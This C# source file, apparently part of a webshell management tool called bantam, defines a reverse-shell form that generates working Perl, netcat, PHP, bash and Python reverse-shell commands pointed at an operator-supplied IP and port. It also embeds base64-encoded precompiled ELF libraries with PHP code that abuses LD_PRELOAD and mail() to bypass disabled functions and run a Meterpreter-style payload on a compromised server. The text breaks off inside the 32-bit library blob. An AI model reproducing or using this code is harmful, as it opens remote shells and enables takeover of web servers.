using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Threading.Tasks;
using System.Windows.Forms;

using bantam.Classes;

namespace bantam.Forms
{
    public partial class ReverseShell : Form
    {
        /// <summary>
        /// 
        /// </summary>
        public string ShellUrl { get; set; }

        /// <summary>
        /// 
        /// </summary>
        public static readonly ReadOnlyCollection<string> shellVectors = new List<string>() {
             "perl",
             "netcat",
             "netcat with pipe",
             "php",
             "bash",
             "python",
             "barrage"
        }.AsReadOnly();

        /// <summary>
        /// 
        /// </summary>
        public ReverseShell(string shellUrl)
        {
            InitializeComponent();

            ShellUrl = shellUrl;

            foreach(var vecs in shellVectors) {
                comboBoxMethod.Items.Add(vecs);
            }

            comboBoxArch.SelectedIndex = 0;
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="ip"></param>
        /// <param name="port"></param>
        /// <returns></returns>
        public string PerlShell(string ip, string port)
        {
            string perlShell = "perl -e 'use Socket;"
                             + "$i=\"" + ip + "\";"
                             + "$p=" + port + ";"
                             + "socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
                             + "if(connect(S,sockaddr_in($p,inet_aton($i)))){"
                                 + "open(STDIN,\">&S\");"
                                 + "open(STDOUT,\">&S\");"
                                 + "open(STDERR,\">&S\");"
                                 + "exec(\"/bin/sh -i\");"
                             + "};'";

            return perlShell;
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="ip"></param>
        /// <param name="port"></param>
        /// <returns></returns>
        public string NetCatShell(string ip, string port)
        {
            return "nc -e /bin/sh " + ip + " " + port;
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="ip"></param>
        /// <param name="port"></param>
        /// <returns></returns>
        public string NetCatPipeShell(string ip, string port)
        {
            string netcatPipe = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + ip + " " + port + " >/tmp/f";
            return netcatPipe;
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="ip"></param>
        /// <param name="port"></param>
        /// <returns></returns>
        public string PhpShell(string ip, string port)
        {
            //todo this requires exec, lets add more shell execution methods incause of disabled functions or possibly not use two system calls???
            string phpShell = "php -r '$sock=fsockopen(\"" + ip + "\"," + port + ");"
                            + "system(\"/bin/sh -i <&3 >&3 2>&3\");'";

            return phpShell;
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="ip"></param>
        /// <param name="port"></param>
        /// <returns></returns>
        public string BashShell(string ip, string port)
        {
            string bashShell = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1";
            return bashShell;
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="ip"></param>
        /// <param name="port"></param>
        /// <returns></returns>
        public string PythonShell(string ip, string port)
        {
            string pythonShell = "python -c 'import socket,subprocess,os;"
                               + "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                               + "s.connect((\"" + ip + "\"," + port + "));"
                               + "os.dup2(s.fileno(),0);" 
                               + "os.dup2(s.fileno(),1);"
                               + "os.dup2(s.fileno(),2);"
                               + "p=subprocess.call([\"/bin/sh\",\"-i\"]);'";

            return pythonShell;
        }


        /// <summary>
        /// Generate Chankro64 bit payload - https://bugs.php.net/bug.php?id=46741 | https://github.com/TarlogicSecurity/Chankro/
        /// Warning - Contains 64 bit precompiled library that will be executed on the server
        /// putenv must be enabled with access to "LD_PRELOAD", mail must be enabled
        /// </summary>
        /// <param name="shellCode"></param>
        /// <returns></returns>
        public string Chankro64BitShell(string b64shellCode)
        {
            string chankro64 = 
            @"$hook64 = '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BwAAAAwAAAAAAAAAAAAAAEiD7AhIiwW9CCAASIXAdAL/0EiDxAjDAP810gggAP8l1AggAA8fQAD/JdIIIABoAAAAAOng/////yXKCCAAaAEAAADp0P////8lwgggAGgCAAAA6cD/////JboIIABoAwAAAOmw/////yWyCCAAaAQAAADpoP////8lqgggAGgFAAAA6ZD/////JaIIIABoBgAAAOmA/////yWaCCAAaAcAAADpcP////8lkgggAGgIAAAA6WD/////JSIIIABmkAAAAAAAAAAASI09gQggAEiNBYEIIABVSCn4SInlSIP4DnYVSIsF1gcgAEiFwHQJXf/gZg8fRAAAXcMPH0AAZi4PH4QAAAAAAEiNPUEIIABIjTU6CCAAVUgp/kiJ5UjB/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAEAGAAAAAAAABwAAAAAAAABoBQAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABIBQAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAABoFAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgOIAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYHAAAAAAAAVgcAAAAAAABmBwAAAAAAAHYHAAAAAAAAhgcAAAAAAACWBwAAAAAAAKYHAAAAAAAAtgcAAAAAAADGBwAAAAAAAGAQIAAAAAAAR0NDOiAoRGViaWFuIDYuMy4wLTE4K2RlYjl1MSkgNi4zLjAgMjAxNzA1MTYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQDIAQAAAAAAAAAAAAAAAAAAAAAAAAMAAgDwAQAAAAAAAAAAAAAAAAAAAAAAAAMAAwA4AgAAAAAAAAAAAAAAAAAAAAAAAAMABAAwBAAAAAAAAAAAAAAAAAAAAAAAAAMABQAaBQAAAAAAAAAAAAAAAAAAAAAAAAMABgBIBQAAAAAAAAAAAAAAAAAAAAAAAAMABwBoBQAAAAAAAAAAAAAAAAAAAAAAAAMACABABgAAAAAAAAAAAAAAAAAAAAAAAAMACQAYBwAAAAAAAAAAAAAAAAAAAAAAAAMACgAwBwAAAAAAAAAAAAAAAAAAAAAAAAMACwDQBwAAAAAAAAAAAAAAAAAAAAAAAAMADADgBwAAAAAAAAAAAAAAAAAAAAAAAAMADQBcCQAAAAAAAAAAAAAAAAAAAAAAAAMADgBlCQAAAAAAAAAAAAAAAAAAAAAAAAMADwB4CQAAAAAAAAAAAAAAAAAAAAAAAAMAEACwCQAAAAAAAAAAAAAAAAAAAAAAAAMAEQD4DSAAAAAAAAAAAAAAAAAAAAAAAAMAEgAIDiAAAAAAAAAAAAAAAAAAAAAAAAMAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAMAFAAYDiAAAAAAAAAAAAAAAAAAAAAAAAMAFQDYDyAAAAAAAAAAAAAAAAAAAAAAAAMAFgAAECAAAAAAAAAAAAAAAAAAAAAAAAMAFwBgECAAAAAAAAAAAAAAAAAAAAAAAAMAGABoECAAAAAAAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAGQAAAAIADADgBwAAAAAAAAAAAAAAAAAAGwAAAAIADAAgCAAAAAAAAAAAAAAAAAAALgAAAAIADABwCAAAAAAAAAAAAAAAAAAARAAAAAEAGABoECAAAAAAAAEAAAAAAAAAUwAAAAEAEgAIDiAAAAAAAAAAAAAAAAAAegAAAAIADACwCAAAAAAAAAAAAAAAAAAAhgAAAAEAEQD4DSAAAAAAAAAAAAAAAAAApQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAArAAAAAEAEABoCgAAAAAAAAAAAAAAAAAAugAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAxgAAAAEAFwBgECAAAAAAAAAAAAAAAAAA0wAAAAEAFAAYDiAAAAAAAAAAAAAAAAAA3AAAAAAADwB4CQAAAAAAAAAAAAAAAAAA7wAAAAEAFwBoECAAAAAAAAAAAAAAAAAA+wAAAAEAFgAAECAAAAAAAAAAAAAAAAAAEQEAABIAAAAAAAAAAAAAAAAAAAAAAAAAJQEAACAAAAAAAAAAAAAAAAAAAAAAAAAAQQEAABAAFwBoECAAAAAAAAAAAAAAAAAA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';
            $meterpreter = '" + b64shellCode + @"';
            file_put_contents('chankro.so', base64_decode($hook64));
            file_put_contents('acpid.socket', ""#!/bin/bash\n"".base64_decode($meterpreter));
            putenv('CHANKRO=./acpid.socket');
            putenv('LD_PRELOAD=./chankro.so');
            mail('a', 'a', 'a', 'a');
            sleep(2);
            unlink('chankro.so');
            unlink('acpid.socket');";

            return chankro64;
        }

        /// <summary>
        /// Generate Chankro32 bit payload - https://bugs.php.net/bug.php?id=46741 | https://github.com/TarlogicSecurity/Chankro/
        /// Warning - Contains 32 bit precompiled library that will be executed on the server
        /// putenv must be enabled with access to "LD_PRELOAD", mail must be enabled
        /// </summary>
        /// <param name="b64ShellCode"></param>
        /// <returns></returns>
        public string Chankro32BitShell(string b64ShellCode)
        {
            string chankro32 =
            @"$hook32 = 'f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAgAUAADQAAAD0FwAAAAAAADQAIAAHACgAHQAcAAEAAAAAAAAAAAAAAAAAAACUCAAAlAgAAAUAAAAAEAAAAQAAAPwOAAD8HgAA/B4AADgBAAA8AQAABgAAAAAQAAACAAAADA8AAAwfAAAMHwAA4AAAAOAAAAAGAAAABAAAAAQAAAAUAQAAFAEAABQBAAAkAAAAJAAAAAQAAAAEAAAAUOV0ZKAHAACgBwAAoAcAADQAAAA0AAAABAAAAAQAAABR5XRkAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAEAAAAFLldGT8DgAA/B4AAPweAAAEAQAABAEAAAQAAAABAAAABAAAABQAAAADAAAAR05VAKQiyIF+4liZljIen1jpqzps+jz3AwAAAA0AAAACAAAABgAAAIiAIFUCxGAJDQAAABEAAAATAAAAQkXV7GBdvVzea5WAu+OSfNhxWBy5jfEO6tPvDhufiAsAAAAAAAAAAAAAAAAAAAAAsgAAAAAAAAAAAAAAEgAAABwAAAAAAAAAAAAAACAAAACXAAAAAAAAAAAAAAASAAAAUgAAAAAAAAAAAAAAIgAAAHkAAAAAAAAAAAAAABIAAACGAAAAAAAAAAAAAAASAAAAAQAAAAAAAAAAAAAAIAAAAKMAAAAAAAAAAAAAABIAAACeAAAAAAAAAAAAAAASAAAAYQAAAAAAAAAAAAAAIAAAADgAAAAAAAAAAAAAACAAAACAAAAAAAAAAAAAAAASAAAAxQAAADQgAAAAAAAAEAAXAI0AAAAJBwAAOgAAABIADACoAAAAQwcAADQAAAASAAwA2AAAADggAAAAAAAAEAAYAMwAAAA0IAAAAAAAABAAGAAQAAAArAQAAAAAAAASAAkAFgAAAHgHAAAAAAAAEgANAHUAAACwBgAAWQAAABIADAAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBwd24AZ2V0ZW52AGNobW9kAHN5c3RlbQBkYWVtb25pemUAc2lnbmFsAGZvcmsAZXhpdABwcmVsb2FkbWUAdW5zZXRlbnYAbGliYy5zby42AF9lZGF0YQBfX2Jzc19zdGFydABfZW5kAEdMSUJDXzIuMS4zAEdMSUJDXzIuMAAAAAACAAAAAgADAAIAAgAAAAIAAgAAAAAAAgABAAEAAQABAAEAAQABAAEAAAABAAIAuwAAABAAAAAAAAAAcx9pCQAAAwDdAAAAEAAAABBpaQ0AAAIA6QAAAAAAAAD8HgAACAAAAAQfAAAIAAAAMCAAAAgAAAAAHwAAAQ8AAOwfAAAGAgAA8B8AAAYEAAD0HwAABgcAAPgfAAAGCgAA/B8AAAYLAAAMIAAABwEAABAgAAAHAwAAFCAAAAcOAAAYIAAABxQAABwgAAAHBQAAICAAAAcGAAAkIAAABwgAACggAAAHCQAALCAAAAcMAABTg+wI6MsAAACBw0sbAACLg/T///+FwHQF6K4AAACDxAhbwwD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABoEAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ/////6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD/////oywAAABoQAAAAOlg/////6Pw////ZpD/o/T///9mkIscJMNmkGaQZpBmkGaQZpDoFwEAAIHCaxoAAI2KNAAAAI2CNwAAACnIg/gGdheLguz///+FwHQNVYnlg+wUUf/Qg8QQyfPDifaNvCcAAAAA6NcAAACBwisaAABVjYo0AAAAjYI0AAAAieVTKcjB+AKD7ASJw8HrHwHY0fh0FIuS/P///4XSd